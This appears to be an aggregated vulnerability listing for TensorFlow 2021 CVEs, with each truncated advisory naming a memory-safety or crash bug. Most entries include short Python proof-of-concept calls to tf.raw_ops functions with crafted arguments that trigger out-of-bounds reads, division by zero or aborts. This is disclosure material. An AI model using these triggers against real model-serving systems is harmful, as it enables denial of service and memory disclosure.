Intel Optimization For Tensorflow vulnerabilities

CVE-2021-37641 [MEDIUM] CWE-125 Heap OOB in `RaggedGather` Heap OOB in `RaggedGather` ### Impact If the arguments to `tf.raw_ops.RaggedGather` don't determine a valid ragged tensor code can trigger a read from outside of bounds of heap allocated buffers. ```python import tensorflow as tf tf.raw_ops.RaggedGather( params_nested_splits = [0,0,0], params_dense_values = [1,1], indices = [0,0,9,0,0], OUTPUT_RAGGED_RANK=0) ``` In debug mode, the same code triggers a `CHECK` failure. The [implement

CVE-2021-37653 [MEDIUM] CWE-369 Division by 0 in `ResourceGather` Division by 0 in `ResourceGather` ### Impact An attacker can trigger a crash via a floating point exception in `tf.raw_ops.ResourceGather`: ```python import tensorflow as tf tensor = tf.constant(value=[[]],shape=(0,1),dtype=tf.uint32) v = tf.Variable(tensor) tf.raw_ops.ResourceGather( resource=v.handle, indices=[0], dtype=tf.uint32, batch_dims=1, validate_indices=False) ``` The [implementation](https://github.com/tensorflow/te

CVE-2021-37690 [MEDIUM] CWE-416 Use after free and segfault in shape inference functions Use after free and segfault in shape inference functions ### Impact When running shape functions, some functions (such as `MutableHashTableShape`) produce extra output information in the form of a `ShapeAndType` struct. The shapes embedded in this struct are owned by an inference context that is cleaned up almost immediately; if the upstream code attempts to access this shape information, it can trigger a s

CVE-2021-37670 [MEDIUM] CWE-125 Heap OOB in `UpperBound` and `LowerBound` Heap OOB in `UpperBound` and `LowerBound` ### Impact An attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to `tf.raw_ops.UpperBound`: ```python import tensorflow as tf tf.raw_ops.UpperBound( sorted_input=[1,2,3], values=tf.constant(value=[[0,0,0],[1,1,1],[2,2,2]],dtype=tf.int64), out_type=tf.int64) ``` The [implementation](https://github.com/tensorflow/tensor

CVE-2021-37683 [MEDIUM] CWE-369 FPE in TFLite division operations FPE in TFLite division operations ### Impact The implementation of division in TFLite is [vulnerable to a division by 0 error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/div.cc) There is no check that the divisor tensor does not contain zero elements. ### Patches We have patched the issue in GitHub commit [1e206baedf8bef0334cca3eb92bab134ef525a28](https://githu

CVE-2021-37673 [MEDIUM] CWE-20 `CHECK`-fail in `MapStage` `CHECK`-fail in `MapStage` ### Impact An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.MapStage`: ```python import tensorflow as tf tf.raw_ops.MapStage( key=tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), indices=tf.constant((0), dtype=tf.int32), values=[tf.constant((0), dtype=tf.int32)], dtypes=[tf.int32, tf.int64], capacity=0, memory_limit=0, container='', shared_name='') ``` The [implementation](ht

CVE-2021-37677 [MEDIUM] CWE-1284 Missing validation in shape inference for `Dequantize` Missing validation in shape inference for `Dequantize` ### Impact The shape inference code for `tf.raw_ops.Dequantize` has a vulnerability that could trigger a denial of service via a segfault if an attacker provides invalid arguments: ```python import tensorflow as tf tf.compat.v1.disable_v2_behavior() tf.raw_ops.Dequantize( input_tensor = tf.constant(-10.0, dtype=tf.float32), input_tensor = tf.cast(input

CVE-2021-37644 [MEDIUM] CWE-617 `std::abort` raised from `TensorListReserve` `std::abort` raised from `TensorListReserve` ### Impact Providing a negative element to `num_elements` list argument of `tf.raw_ops.TensorListReserve` causes the runtime to abort the process due to reallocating a `std::vector` to have a negative number of elements: ```python import tensorflow as tf tf.raw_ops.TensorListReserve( element_shape = tf.constant([1]), num_elements=tf.constant([-1]), element_dtype = tf.int32

CVE-2021-37669 [MEDIUM] CWE-681 Crash in NMS ops caused by integer conversion to unsigned Crash in NMS ops caused by integer conversion to unsigned ### Impact An attacker can cause denial of service in applications serving models using `tf.raw_ops.NonMaxSuppressionV5` by triggering a division by 0: ```python import tensorflow as tf tf.raw_ops.NonMaxSuppressionV5( boxes=[[0.1,0.1,0.1,0.1],[0.2,0.2,0.2,0.2],[0.3,0.3,0.3,0.3]], scores=[1.0,2.0,3.0], max_output_size=-1, iou_threshold=0.5, score_t

CVE-2021-37680 [MEDIUM] CWE-369 Division by zero in TFLite Division by zero in TFLite ### Impact The implementation of fully connected layers in TFLite is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/fully_connected.cc#L226): ```cc const int batch_size = input_size / filter->dims->data[1]; ``` An attacker can craft a model such that `filter->dims->data[1]` is 0. ### Patches We have patc

CVE-2021-37660 [MEDIUM] CWE-369 Division by 0 in inplace operations Division by 0 in inplace operations ### Impact An attacker can cause a floating point exception by calling inplace operations with crafted arguments that would result in a division by 0: ```python import tensorflow as tf tf.raw_ops.InplaceSub(x=[],i=[-99,-1,-1],v=[1,1,1]) ``` The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/inplace_ops.cc#L283

CVE-2021-37656 [MEDIUM] CWE-824 Reference binding to nullptr in `RaggedTensorToSparse` Reference binding to nullptr in `RaggedTensorToSparse` ### Impact An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.RaggedTensorToSparse`: ```python import tensorflow as tf tf.raw_ops.RaggedTensorToSparse( rt_nested_splits=[[0, 38, 0]], rt_dense_values=[]) ``` The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a

CVE-2021-37685 [MEDIUM] CWE-125 Heap OOB in TFLite Heap OOB in TFLite ### Impact TFLite's [`expand_dims.cc`](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/expand_dims.cc#L36-L50) contains a vulnerability which allows reading one element outside of bounds of heap allocated data: ```cc if (axis size; ++i) { if (i data[i] = input_dims.data[i]; } else if (i == axis) { output_dims->data[i] = 1; } else { output_dims->data[i] = input_di

CVE-2021-37675 [MEDIUM] CWE-369 Division by 0 in most convolution operators Division by 0 in most convolution operators ### Impact Most implementations of convolution operators in TensorFlow are affected by a division by 0 vulnerability where an attacker can trigger a denial of service via a crash: ```python import tensorflow as tf tf.compat.v1.disable_v2_behavior() tf.raw_ops.Conv2D( input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32), filter = tf.constant([], shape=[0, 0, 0, 0], d

CVE-2021-37642 [MEDIUM] CWE-369 Division by 0 in `ResourceScatterDiv` Division by 0 in `ResourceScatterDiv` ### Impact The implementation of `tf.raw_ops.ResourceScatterDiv` is vulnerable to a division by 0 error: ```python import tensorflow as tf v= tf.Variable([1,2,3]) tf.raw_ops.ResourceScatterDiv( resource=v.handle, indices=[1], updates=[0]) ``` The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/resource_vari

CVE-2021-37661 [MEDIUM] CWE-681 Crash caused by integer conversion to unsigned Crash caused by integer conversion to unsigned ### Impact An attacker can cause a denial of service in `boosted_trees_create_quantile_stream_resource` by using negative arguments: ```python import tensorflow as tf from tensorflow.python.ops import gen_boosted_trees_ops import numpy as np v= tf.Variable([0.0, 0.0, 0.0, 0.0, 0.0]) gen_boosted_trees_ops.boosted_trees_create_quantile_stream_resource( quantile_stream_re

CVE-2021-37645 [MEDIUM] CWE-681 Integer overflow due to conversion to unsigned Integer overflow due to conversion to unsigned ### Impact The implementation of `tf.raw_ops.QuantizeAndDequantizeV4Grad` is vulnerable to an integer overflow issue caused by converting a signed integer value to an unsigned one and then allocating memory based on this value. ```python import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=[1.0,2.0], input=[1.0,1.0], input_min=[0.0], input_max=[10.

CVE-2021-37692 [MEDIUM] CWE-20 Segfault on strings tensors with mistmatched dimensions, due to Go code Segfault on strings tensors with mistmatched dimensions, due to Go code ### Impact Under certain conditions, Go code can trigger a segfault in string deallocation. For string tensors, `C.TF_TString_Dealloc` is called during garbage collection within a finalizer function. However, tensor structure isn't checked until encoding to avoid a performance penalty. The current method for dealloc assu

CVE-2021-37646 [MEDIUM] CWE-681 Bad alloc in `StringNGrams` caused by integer conversion Bad alloc in `StringNGrams` caused by integer conversion ### Impact The implementation of `tf.raw_ops.StringNGrams` is vulnerable to an integer overflow issue caused by converting a signed integer value to an unsigned one and then allocating memory based on this value. ```python import tensorflow as tf tf.raw_ops.StringNGrams( data=['',''], data_splits=[0,2], separator=' '*100, ngram_widths=[-80,0,0,-60],

CVE-2021-37668 [MEDIUM] CWE-369 FPE in `tf.raw_ops.UnravelIndex` FPE in `tf.raw_ops.UnravelIndex` ### Impact An attacker can cause denial of service in applications serving models using `tf.raw_ops.UnravelIndex` by triggering a division by 0: ```python import tensorflow as tf tf.raw_ops.UnravelIndex(indices=-1, dims=[1,0,2]) ``` The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unravel_index_op.cc#L36) does not